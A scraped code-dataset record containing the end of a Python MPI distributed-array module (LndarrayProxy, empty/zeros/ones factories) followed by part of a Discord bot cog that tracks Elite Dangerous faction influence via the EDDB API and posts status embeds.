if (_sys.version_info[0] >= 3) and (_sys.version_info[1] >= 5):
PartitionViewSlices.__doc__ =\
"""
Stores multiple :obj:`tuple`-of-:obj:`slice` objects indicating
    the slice (tile) of the :obj:`lndarray` on which an :samp:`intra_locale_comm`
rank MPI process operates.
"""
PartitionViewSlices.rank_view_slice_n.__doc__ =\
"""
Slice indicating tile of the non-halo array.
"""
PartitionViewSlices.rank_view_slice_h.__doc__ =\
"""
The slice :attr:`rank_view_slice_n` with halo added.
"""
PartitionViewSlices.rank_view_relative_slice_n.__doc__ =\
"""
*Relative* slice which can be used to remove the
halo elements from a view generated using :attr:`rank_view_slice_h`.
"""
PartitionViewSlices.rank_view_partition_slice_h.__doc__ =\
"""
Slice indicating tile of the halo array.
"""
PartitionViewSlices.lndarray_view_slice_n.__doc__ =\
"""
Slice for generating a view of a :obj:`lndarray` with
the halo removed.
"""
#: Cache for locale array partitioning
_intra_partition_cache = _collections.defaultdict(lambda: None)
class LndarrayProxy(object):
"""
Proxy for :obj:`lndarray` instances. Provides :samp:`peer_rank`
views of the array for parallelism.
"""
#: The "low index" indices.
LO = _LocaleExtent.LO
#: The "high index" indices.
HI = _LocaleExtent.HI
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
intra_locale_rank=None,
intra_locale_size=0,
intra_partition_dims=None,
locale_extent=None,
halo=None,
comms_and_distrib=None,
rma_window_buffer=None
):
"""
        Initialise. :samp:`{locale_extent}` must be specified; :samp:`{shape}`,
        when given, must match :samp:`{locale_extent}.shape_h`.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: Shape of the array apportioned to this locale. If :samp:`None`
shape is taken as :samp:`{locale_extent}.shape_h`.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`memoryview`
:param buffer: The sequence of bytes providing array element storage.
Must be specified (not :samp:`None`).
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type locale_extent: :obj:`mpi_array.distribution.LocaleExtent`
:param locale_extent: The array extent to be allocated on this locale.
"""
self = object.__new__(cls)
# initialise these members before potential exceptions
# because they are referenced in self.free (via self.__del__).
self._lndarray = None
self.rma_window_buffer = None
if locale_extent is None or (not isinstance(locale_extent, _LocaleExtent)):
raise ValueError(
"Got locale_extent=%s, expecting instance of type %s"
%
(locale_extent, _LocaleExtent)
)
if (shape is not None) and (not _np.all(locale_extent.shape_h == shape)):
raise ValueError(
"Got conflicting locale shape: shape=%s, locale_extent.shape_n=%s"
%
(shape, locale_extent.shape_h)
)
self._lndarray = \
lndarray(
shape=locale_extent.shape_h,
dtype=dtype,
buffer=buffer,
offset=offset,
strides=strides,
order=order
)
self._intra_locale_rank = intra_locale_rank
self._intra_locale_size = intra_locale_size
self._intra_partition_dims = intra_partition_dims
self._locale_extent = locale_extent
self._halo = _convert_halo_to_array_form(halo, self._locale_extent.ndim)
self._intra_partition_dims = _np.zeros_like(locale_extent.shape_h)
self._intra_partition_dims, self._intra_partition = \
self.calculate_intra_partition(
intra_locale_size=self._intra_locale_size,
intra_locale_dims=self._intra_partition_dims,
intra_locale_rank=self._intra_locale_rank,
extent=self._locale_extent,
halo=self._halo
)
self.comms_and_distrib = comms_and_distrib
self.rma_window_buffer = rma_window_buffer
return self
def free(self):
"""
Release locale array memory and assign :samp:`None` to self attributes.
"""
if self._lndarray is not None:
self._lndarray.free()
self._lndarray = None
self._intra_locale_rank = None
self._intra_locale_size = None
self._intra_partition_dims = None
self._locale_extent = None
self._halo = None
self._intra_partition_dims = None
self._intra_partition = None
self.comms_and_distrib = None
if self.rma_window_buffer is not None:
self.rma_window_buffer.free()
self.rma_window_buffer = None
def __del__(self):
"""
Calls :meth:`free`.
"""
self.free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
def calculate_intra_partition(
self,
intra_locale_size,
intra_locale_dims,
intra_locale_rank,
extent,
halo
):
"""
        Splits :samp:`{extent}` into :samp:`self.intra_locale_size` tiles.
"""
global _intra_partition_cache
key = \
(
intra_locale_size,
tuple(intra_locale_dims),
intra_locale_rank,
extent.to_tuple(),
tuple(tuple(row) for row in halo.tolist())
)
partition_pair = _intra_partition_cache[key]
if partition_pair is None:
ndim = extent.ndim
rank_view_slice_n = tuple()
rank_view_slice_h = rank_view_slice_n
rank_view_relative_slice_n = rank_view_slice_n
rank_view_partition_h = rank_view_slice_n
lndarray_view_slice_n = rank_view_slice_n
if ndim > 0:
intra_locale_dims = \
_array_split.split.calculate_num_slices_per_axis(
intra_locale_dims,
intra_locale_size
)
if extent.size_n > 0:
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_n,
axis=intra_locale_dims,
halo=0,
array_start=extent.start_n
)
split = shape_splitter.calculate_split()
rank_extent = \
_HaloSubExtent(
globale_extent=extent,
slice=split.flatten()[intra_locale_rank],
halo=halo
)
# Convert rank_extent_n and rank_extent_h from global-indices
# to local-indices
rank_extent = extent.globale_to_locale_extent_h(rank_extent)
rank_h_relative_extent_n = \
_IndexingExtent(
start=rank_extent.start_n - rank_extent.start_h,
stop=rank_extent.start_n - rank_extent.start_h + rank_extent.shape_n,
)
rank_view_slice_n = rank_extent.to_slice_n()
rank_view_slice_h = rank_extent.to_slice_h()
rank_view_relative_slice_n = rank_h_relative_extent_n.to_slice()
rank_view_partition_h = rank_view_slice_n
if _np.any(extent.halo > 0):
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_h,
axis=intra_locale_dims,
halo=0,
)
split = shape_splitter.calculate_split()
rank_view_partition_h = split.flatten()[intra_locale_rank]
lndarray_view_slice_n = extent.globale_to_locale_extent_h(extent).to_slice_n()
partition_pair = \
(
intra_locale_dims,
PartitionViewSlices(
rank_view_slice_n,
rank_view_slice_h,
rank_view_relative_slice_n,
rank_view_partition_h,
lndarray_view_slice_n
)
)
_intra_partition_cache[key] = partition_pair
return partition_pair
def __getitem__(self, *args, **kwargs):
"""
Return slice/item from :attr:`lndarray` array.
"""
return self._lndarray.__getitem__(*args, **kwargs)
def __setitem__(self, *args, **kwargs):
"""
Set slice/item in :attr:`lndarray` array.
"""
self._lndarray.__setitem__(*args, **kwargs)
def __eq__(self, other):
"""
"""
if isinstance(other, LndarrayProxy):
return self._lndarray == other._lndarray
else:
return self._lndarray == other
@property
def lndarray(self):
"""
An :obj:`lndarray` instance containing array data in (potentially)
shared memory.
"""
return self._lndarray
@property
def intra_partition(self):
"""
A :obj:`PartitionViewSlices` containing slices for this rank (of :samp:`peer_comm`).
"""
return self._intra_partition
@property
def intra_partition_dims(self):
"""
A sequence of integers indicating the number of partitions
along each axis which determines the per-rank views of the locale extent array.
"""
return self._intra_partition_dims
@property
def locale_extent(self):
"""
A :obj:`LocaleExtent` describing the portion of the array assigned to this locale.
"""
return self._locale_extent
@property
def halo(self):
"""
The number of ghost cells for intra locale partitioning of the extent.
This is an upper bound on the per-rank partitions, with the halo possibly
trimmed by the halo extent (due to being on globale boundary).
"""
return self._halo
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._lndarray.md
@property
def dtype(self):
"""
A :obj:`numpy.dtype` object describing the element type of this array.
"""
return self._lndarray.dtype
@property
def shape(self):
"""
The shape of the locale array (including halo), i.e. :samp:`self.lndarray.shape`.
"""
return self._lndarray.shape
@property
def rank_view_n(self):
"""
A tile view of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_n]
@property
def rank_view_h(self):
"""
A tile view (including halo elements) of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_h]
@property
def rank_view_slice_n(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_n`.
"""
return self._intra_partition.rank_view_slice_n
@property
def rank_view_slice_h(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_h`.
"""
return self._intra_partition.rank_view_slice_h
@property
def rank_view_partition_h(self):
"""
        Rank tile view from the partitioning of the entire :samp:`self._lndarray`
        (i.e. the partition of the halo array). Same as :samp:`self.rank_view_n` when
halo is zero.
"""
return self._lndarray[self._intra_partition.rank_view_partition_slice_h]
@property
def view_n(self):
"""
View of entire array without halo.
"""
return self._lndarray[self._intra_partition.lndarray_view_slice_n]
@property
def view_h(self):
"""
        The entire :obj:`LndarrayProxy` view including halo (i.e. :samp:`{self}`).
"""
return self._lndarray.view()
def fill(self, value):
"""
Fill the array with a scalar value (excludes ghost elements).
:type value: scalar
:param value: All non-ghost elements are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_slice_n].fill(value)
def fill_h(self, value):
"""
Fill the array with a scalar value (including ghost elements).
:type value: scalar
:param value: All elements (including ghost elements) are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_partition_slice_h].fill(value)
def empty(
shape=None,
dtype="float64",
comms_and_distrib=None,
order='C',
return_rma_window_buffer=False,
intra_partition_dims=None,
**kwargs
):
"""
Creates array of uninitialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
    :type comms_and_distrib: :samp:`None` or :obj:`object`
    :param comms_and_distrib: Communicators and distribution, as returned
       by :func:`mpi_array.comms.create_distribution`; created from :samp:`{shape}`
       and :samp:`{kwargs}` when :samp:`None`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with uninitialised elements.
"""
if comms_and_distrib is None:
comms_and_distrib = create_distribution(shape=shape, **kwargs)
intra_locale_rank = comms_and_distrib.locale_comms.intra_locale_comm.rank
intra_locale_size = comms_and_distrib.locale_comms.intra_locale_comm.size
locale_extent = \
comms_and_distrib.distribution.get_extent_for_rank(
inter_locale_rank=comms_and_distrib.this_locale.inter_locale_rank
)
rma_window_buffer = \
comms_and_distrib.locale_comms.alloc_locale_buffer(
shape=locale_extent.shape_h,
dtype=dtype
)
kwargs = dict()
if not return_rma_window_buffer:
kwargs = {
"comms_and_distrib": comms_and_distrib,
"rma_window_buffer": rma_window_buffer,
}
ret = \
LndarrayProxy(
shape=rma_window_buffer.shape,
buffer=rma_window_buffer.buffer,
dtype=dtype,
order=order,
intra_locale_rank=intra_locale_rank,
intra_locale_size=intra_locale_size,
intra_partition_dims=intra_partition_dims,
locale_extent=locale_extent,
halo=comms_and_distrib.distribution.halo,
**kwargs
)
if return_rma_window_buffer:
ret = ret, rma_window_buffer
return ret
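# Hypothetical usage sketch for the factory functions in this module (assumes
# an initialised MPI environment, e.g. a run launched under mpirun):
#
#   lary = empty(shape=(100, 200), dtype="int32")
#   lary.fill(0)             # zero this rank's (non-halo) tile
#   view = lary.rank_view_h  # tile view including halo elements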
def empty_like(ary, dtype=None):
"""
Return a new array with the same shape and type as a given array.
:type ary: :obj:`numpy.ndarray`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :samp:`type(ary)`
    :return: Array of uninitialised (arbitrary) data with the same shape and type as :samp:`{ary}`.
"""
if dtype is None:
dtype = ary.dtype
if (isinstance(ary, LndarrayProxy)):
ret_ary = \
empty(
dtype=ary.dtype,
comms_and_distrib=ary.comms_and_distrib,
order=ary.md.order,
intra_partition_dims=ary.intra_partition_dims
)
else:
ret_ary = _np.empty_like(ary, dtype=dtype)
return ret_ary
def zeros(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of zero-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
    :type comms_and_distrib: :samp:`None` or :obj:`object`
    :param comms_and_distrib: Communicators and distribution, as returned
       by :func:`mpi_array.comms.create_distribution`; created from :samp:`{shape}`
       and :samp:`{kwargs}` when :samp:`None`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with zero-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def zeros_like(ary, *args, **kwargs):
"""
Return a new zero-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of zero-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def ones(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of one-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
    :type comms_and_distrib: :samp:`None` or :obj:`object`
    :param comms_and_distrib: Communicators and distribution, as returned
       by :func:`mpi_array.comms.create_distribution`; created from :samp:`{shape}`
       and :samp:`{kwargs}` when :samp:`None`.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with one-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def ones_like(ary, *args, **kwargs):
"""
Return a new one-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of one-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def copy(ary):
"""
Return an array copy of the given object.
:type ary: :obj:`LndarrayProxy`
:param ary: Array to copy.
:rtype: :obj:`LndarrayProxy`
:return: A copy of :samp:`ary`.
"""
ary_out = empty_like(ary)
ary_out.rank_view_n[...] = ary.rank_view_n[...]
return ary_out
__all__ = [s for s in dir() if not s.startswith('_')]
| mit | -2,072,150,402,537,923,600 | 31.78579 | 99 | 0.564608 | false | 3.942489 | false | false | false |
nisanick/Prisma_Machina | cogs/bgs.py | 1 | 29859 | from datetime import datetime
import discord
from discord.ext import commands
import asyncio
import checks
import database
from dateutil.parser import isoparse
from config import BGS_CHANNEL
from data.faction import Faction
from web import Web
class BGS(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.system_cache = {}
self.faction_cache = {}
self.updated_systems = set()
self.last_tick = None
self.tick_id = 0
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.war_cache = {}
# @commands.command(name='fullscan', case_insensitive=True, hidden=True)
# @commands.check(checks.can_manage_bot)
async def _full_scan(self, ctx, *, faction_name):
async with ctx.typing():
await self._fullscan_faction(faction_name, 1)
await ctx.send("done")
async def _fullscan_faction(self, faction_name, page):
args = {
'factionname': faction_name,
'page': page
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
for system in data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', {'eddbid': system.controlling_minor_faction_id}, 'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
await db.execute(insert_system, *system_values)
for faction in system.minor_faction_presences:
await self._process_faction_data(faction.minor_faction_id)
states = ""
pending = ""
recovering = ""
for state in faction.active_states:
if len(states) > 0:
states = states + '|'
states = states + state.name
for state in faction.pending_states:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.name
for state in faction.recovering_states:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.name
async with db.transaction():
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction.minor_faction_id,
system.id,
faction.influence,
self.tick_id,
states,
pending,
recovering
)
await db.execute(insert_influence, *influence_values)
await database.Database.close_connection(db)
if int(data.page) < int(data.pages):
await self._fullscan_faction(faction_name, page + 1)
async def _process_faction_data(self, faction_id):
args = {
'eddbid': faction_id
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
for faction in data.docs:
if str(faction_id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', {'eddbid': faction.home_system_id}, 'object')
system_name = home_system_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
await db.execute(insert_faction, *faction_values)
await database.Database.close_connection(db)
async def _get_system_id(self, system_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_result = await db.fetchrow("SELECT id FROM star_system where name = $1", system_name)
if system_result is None:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'name': system_name}, 'object')
for system in home_system_data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'eddbid': system.controlling_minor_faction_id},
'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
system_id = system.id
await db.execute(insert_system, *system_values)
else:
system_id = system_result['id']
await database.Database.close_connection(db)
return system_id
async def _get_faction_id(self, faction_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
faction_result = await db.fetchrow("SELECT id FROM faction where name = $1", faction_name)
if faction_result is None:
faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'name': faction_name}, 'object')
for faction in faction_data.docs:
if str(faction.id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
faction_data = await Web.get_response(
'https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': faction.home_system_id}, 'object')
system_name = faction_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
faction_id = faction.id
await db.execute(insert_faction, *faction_values)
else:
faction_id = faction_result['id']
await database.Database.close_connection(db)
return faction_id
async def set_tick_date(self, date):
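        """
        Store a new tick time. If it is newer than the last known tick, reset
        the per-tick caches, post fresh BGS status messages for the three
        tracked factions and save their message ids.
        """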
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
if self.last_tick is None or self.last_tick < date:
insert_tick = "INSERT INTO tick(time) values($1) ON CONFLICT DO NOTHING"
await db.execute(insert_tick, date)
self.updated_systems = set()
self.war_cache = {}
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.last_tick = date
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
channel = self.bot.get_channel(BGS_CHANNEL)
# await self.recheck_systems() FIXME - EDDN API is currently not updating
self.faction_data[75253].message = await self.setup_bgs_message(channel, 75253) # Colonists of Aurora
self.faction_data[23831].message = await self.setup_bgs_message(channel, 23831) # Prismatic Imperium
self.faction_data[74847].message = await self.setup_bgs_message(channel, 74847) # Adamantine Union
update_faction = "UPDATE faction SET message_id = $1 WHERE id = $2"
await db.execute(update_faction, *(self.faction_data[75253].message, 75253))
await db.execute(update_faction, *(self.faction_data[23831].message, 23831))
await db.execute(update_faction, *(self.faction_data[74847].message, 74847))
await database.Database.close_connection(db)
async def setup_bgs_message(self, channel, faction_id):
embed = discord.Embed(colour=discord.Colour(0x992d22), url=self.faction_data[faction_id].link, title=self.faction_data[faction_id].name.upper())
embed.set_author(name="Tick at {:%d %b %Y %H:%M}".format(self.last_tick))
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select id as system_id, name from star_system where our_faction_id = $1 order by name"
system_count = 0
systems = []
async for (system_id, name) in db.cursor(system_select, faction_id):
system_count = system_count + 1
systems.append(name)
self.faction_data[faction_id].systems = system_count
# progress field
embed.add_field(name="Tour progress", value="0/{} - 0%".format(system_count), inline=False)
# missing stations
if len(systems) > 0:
missing_systems = ", ".join(systems)
else:
missing_systems = "Tour completed"
embed.add_field(name="Missing systems", value="{}".format(missing_systems), inline=False)
# states
embed.add_field(name="Active states", value="None", inline=False)
embed.add_field(name="Pending states", value="None")
embed.add_field(name="Recovering states", value="None")
# expansion warning
embed.add_field(name="Expansion warning", value="None")
# low inf warning
embed.add_field(name="Inf getting low", value="None")
# conflict warning
embed.add_field(name="Inf too low", value="None")
# Not controll system warning
embed.add_field(name="Not in control", value="None")
await database.Database.close_connection(db)
message = await channel.send(embed=embed)
# await message.pin()
return message.id
async def recheck_systems(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "SELECT id as system_id, our_faction_id FROM star_system WHERE our_faction_id > 0"
async for (system_id, our_faction_id) in db.cursor(system_select):
system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': system_id}, 'object')
present = False
for system in system_data.docs:
for faction in system.minor_faction_presences:
if faction.minor_faction_id == our_faction_id:
present = True
if not present:
remove_query = "DELETE FROM star_system WHERE id = $1"
await db.execute(remove_query, system_id)
await database.Database.close_connection(db)
async def init_bgs(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
tick_id, time = await db.fetchrow(tick_select)
self.tick_id = tick_id
self.last_tick = time
messages_select = "SELECT id as faction_id, message_id FROM faction where id in (74847, 23831, 75253)"
async for (faction_id, message_id) in db.cursor(messages_select):
system_select = "select count(*) as system_count from star_system where our_faction_id = $1"
async for record in db.cursor(system_select, faction_id):
self.faction_data[faction_id].systems = record['system_count']
self.faction_data[faction_id].message = message_id
states_select = "select star_system.name, influence.system, influence.influence, influence.states, pending, recovering from influence join star_system on star_system.id = influence.system where tick = $1 and faction = $2"
async for (name, system_id, influence, states, pending, recovering) in db.cursor(states_select, *(tick_id, faction_id)):
self.updated_systems.add(name)
self.faction_data[faction_id].set_active(states)
self.faction_data[faction_id].set_pending(pending)
self.faction_data[faction_id].set_recovering(recovering)
influence_select = "select faction, influence.influence from influence where influence.system = $1 and tick = $2 order by influence desc limit 2"
their_influence = 0
async for (inf_faction_id, faction_influence) in db.cursor(influence_select, *(system_id, tick_id)):
if not inf_faction_id == faction_id:
if faction_influence > their_influence:
their_influence = faction_influence
if influence > 65.00:
self.faction_data[faction_id].expansion_warning.append("{} {}%".format(name, round(influence, 2)))
else:
difference = influence - their_influence
if 10.00 < difference <= 20.00:
self.faction_data[faction_id].mild_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference < 0.00:
self.faction_data[faction_id].not_control.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference <= 10.00:
self.faction_data[faction_id].high_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
await self.update_message(faction_id)
await database.Database.close_connection(db)
async def update_message(self, faction_id, conflict_data=None):
faction = self.faction_data[faction_id]
channel = self.bot.get_channel(BGS_CHANNEL)
message = await channel.fetch_message(faction.message)
embed = message.embeds[0]
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select star_system.id as system_id, name from star_system" \
" left join influence on star_system.id = influence.system and tick = $1 " \
"where our_faction_id = $2 and influence.influence is null order by name;"
missing_count = 0
missing_systems = []
async for (system_id, name) in db.cursor(system_select, *(self.tick_id, faction_id)):
missing_count = missing_count + 1
missing_systems.append(name)
done_count = faction.systems - missing_count
percentage = 100 * done_count / faction.systems
embed.set_field_at(0, name="Tour progress", value="{}/{} - {}%".format(done_count, faction.systems, round(percentage)), inline=False)
if len(missing_systems) > 0:
systems = ", ".join(missing_systems)
else:
systems = "Tour completed"
embed.set_field_at(1, name="Missing systems", value="{}".format(systems), inline=False)
embed.set_field_at(2, name="Active states", value="{}".format(faction.active), inline=False)
embed.set_field_at(3, name="Pending states", value="{}".format(faction.pending))
embed.set_field_at(4, name="Recovering states", value="{}".format(faction.recovering))
if len(faction.expansion_warning) > 0:
expansion_warning = "\n".join(faction.expansion_warning)
else:
expansion_warning = "None"
if len(faction.mild_warning) > 0:
mild_warning = "\n".join(faction.mild_warning)
else:
mild_warning = "None"
if len(faction.high_warning) > 0:
high_warning = "\n".join(faction.high_warning)
else:
high_warning = "None"
if len(faction.not_control) > 0:
not_control = "\n".join(faction.not_control)
else:
not_control = "None"
embed.set_field_at(5, name="Expansion warning", value="{}".format(expansion_warning))
embed.set_field_at(6, name="Inf getting low", value="{}".format(mild_warning))
embed.set_field_at(7, name="Inf too low", value="{}".format(high_warning))
embed.set_field_at(8, name="Not in control", value="{}".format(not_control))
if conflict_data is not None:
name, value = conflict_data
embed.add_field(name=name, value=value)
await message.edit(embed=embed)
await database.Database.close_connection(db)
async def submit(self, data):
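        """
        Process one journal event: for a system not yet updated this tick,
        store each faction's influence and states, track conflicts involving
        our factions, refresh the warning lists and update the status message.
        """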
db = await database.Database.get_connection(self.bot.loop)
influences = []
our_influence = 0
our_id = 0
skip = False
conflict_data = None
async with db.transaction():
timestamp = isoparse(data.timestamp)
# if timestamp > self.last_tick and data.StarSystem not in self.updated_systems:
if timestamp > self.last_tick:
if data.StarSystem not in self.updated_systems:
self.updated_systems.add(data.StarSystem)
system_id = await self._get_system_id(data.StarSystem)
for faction in data.Factions:
faction_id = await self._get_faction_id(faction.Name)
states = ""
pending = ""
recovering = ""
try:
for state in faction.ActiveStates:
if len(states) > 0:
states = states + '|'
states = states + state.State
except AttributeError as e:
states = faction.FactionState
try:
for state in faction.RecoveringStates:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.State
except AttributeError as e:
recovering = ''
try:
for state in faction.PendingStates:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.State
except AttributeError as e:
pending = ''
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction_id,
system_id,
faction.Influence * 100,
self.tick_id,
states,
pending,
recovering
)
if faction_id in (75253, 23831, 74847):
our_faction = self.faction_data[faction_id]
our_influence = faction.Influence * 100
our_id = faction_id
our_faction.set_recovering(recovering)
our_faction.set_active(states)
our_faction.set_pending(pending)
influences.append(faction.Influence * 100)
await db.execute(insert_influence, *influence_values)
update_system = "UPDATE star_system SET our_faction_id = $1 WHERE id = $2"
await db.execute(update_system, *(our_id, system_id))
try:
for conflict in data.Conflicts:
faction1 = await self._get_faction_id(conflict.Faction1.Name)
faction2 = await self._get_faction_id(conflict.Faction2.Name)
if faction1 in (75253, 23831, 74847) or faction2 in (75253, 23831, 74847):
